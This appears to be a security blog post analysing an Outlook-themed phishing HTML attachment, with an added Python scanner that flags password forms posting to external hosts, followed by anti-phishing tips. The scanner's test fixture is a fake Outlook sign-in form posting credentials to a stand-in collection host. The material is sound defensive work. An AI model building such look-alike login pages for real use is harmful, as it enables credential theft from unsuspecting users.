Analyzing an Outlook phishing attack

by Malware · Security Research & Analysis · Threat Analysis · Web Security

It is part of my routine to read emails before starting my daily work while enjoying my cup of coffee. While browsing for important emails I need to separate the spam from legitimate mail and analyze the spam. I was sorting out the spam emails when I came across an odd email that looks old:

At first I thought the old “DHL” and “tracking” malware had risen again, compliments of the Trojan Bredolab, so I decided to prioritize this specific email. I took the sample into a controlled environment and opened the HTML attachment to monitor its behavior. After double-clicking the attachment the following scripting message showed up:

To monitor the behavior further I clicked “OK”, proceeded, and was shown the following page:

The page shown above looks legitimate to unsuspecting users. They may take it to be served from the Internet, but it is actually loaded from the local machine where the HTML file was opened.

As seen on this page, it is obvious that this phishing email targets Outlook accounts. Once an unsuspecting user enters their email credentials and clicks the “Sign in” button, the credentials are sent to another address, as shown by the source code of the page below:

Investigating the link where the email credentials are sent shows the following robots.txt description for the link:

This specific phishing malware is detected by CYREN as HTML/Phish.BN.
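The pattern described above (an HTML attachment opened from the local disk whose login form posts the entered credentials to a remote address) can be flagged automatically before a user ever sees the page. The following scanner is an added example written for this article; it is not code from the original analysis and does not reproduce the actual phishing page. It parses an HTML attachment with Python's standard `html.parser`, collects every `<form>`, and reports forms that contain a password field and whose `action` points to an external host or to a `mailto:` address. The sample attachment bodies, the `phish.example.invalid` host and the brand keyword list are all constructed for the example.

```python
"""Flag HTML e-mail attachments that behave like local credential-harvesting pages.

Heuristic: a form with a password input whose action sends the data somewhere
remote (http/https host or a mailto: address) while the page itself is opened
from the local file system. Added example; sample inputs are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and the input types it holds."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "method": str, "inputs": [types]}
        self.text = []         # visible text, used for the brand-lure check
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

    def handle_data(self, data):
        self.text.append(data)


def remote_target(action):
    """Return the external destination of a form action, or None when it stays local.

    A relative action (e.g. "login.php") resolves against the local file and is
    not reported; an absolute http(s) URL or a mailto: address leaves the machine.
    """
    parts = urlsplit(action.strip())
    if parts.scheme in ("http", "https") and parts.netloc:
        return parts.netloc
    if parts.scheme == "mailto" and parts.path:
        return parts.path          # credentials mailed straight to a mailbox
    return None


def scan_attachment(html, brand_words=("outlook", "hotmail", "sign in")):
    """Return a list of findings for one HTML attachment body (empty when clean)."""
    parser = FormCollector()
    parser.feed(html)
    visible = " ".join(parser.text).lower()
    findings = []
    for form in parser.forms:
        target = remote_target(form["action"])
        if "password" in form["inputs"] and target is not None:
            findings.append({
                "reason": "password form sends data off the local machine",
                "target": target,
                "method": form["method"],
                # brand words in the visible text make the lure more convincing
                "brand_lure": any(w in visible for w in brand_words),
            })
    return findings


# Constructed sample: a look-alike sign-in page posting to an external host.
SAMPLE_PHISH = """<html><head><title>Sign in to your account</title></head>
<body><h2>Outlook</h2>
<form method="post" action="http://phish.example.invalid/collect.php">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Constructed sample: same form shape, but the action is relative (stays local).
SAMPLE_LOCAL = """<html><body>
<form method="post" action="login.php">
  <input type="text" name="user"><input type="password" name="pw">
</form></body></html>"""

if __name__ == "__main__":
    for name, body in (("phish", SAMPLE_PHISH), ("local", SAMPLE_LOCAL)):
        print(name, scan_attachment(body))
```

Run against a mail gateway's quarantined `.html`/`.htm` attachments, a non-empty result is a good reason to hold the message; the `target` field is the address to look up, which is where the robots.txt check in the article comes in.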

Malware authors have devised several methods of identity theft. The most common form of phishing exploits the weakest link in the security chain, the human user, through social engineering. Malware authors can easily create fake pages or emails that look very similar to the original ones and then spam them out. Knowledgeable users who receive such spam emails would, of course, just ignore them. But the authors’ targets are users who lack knowledge about Internet security.

Because phishing is one of the most devious forms of identity theft, it is important for users to learn how to protect themselves against phishing attacks. Below are some tips to avoid identity theft:

  1. Be wary of emails that:
      1. come from unrecognized senders.
      2. ask you to confirm personal or financial information over the Internet.
      3. are not personalized.
      4. try to upset you or threaten you with frightening information.
      5. contain links that ask for personal information.
  2. Do not click on links, download files or open attachments in emails from unknown senders.
  3. Never email personal or financial information.
  4. Beware of pop-ups:
      1. Do not click on links in pop-up screens.
      2. Do not copy web addresses from pop-ups into your browser.
      3. Never enter personal information in a pop-up screen.
  5. Protect your computer with a firewall and by installing spam filters, anti-virus and anti-spyware software. Update your anti-virus and anti-spyware definitions regularly to protect yourself from the latest as well as older threats.
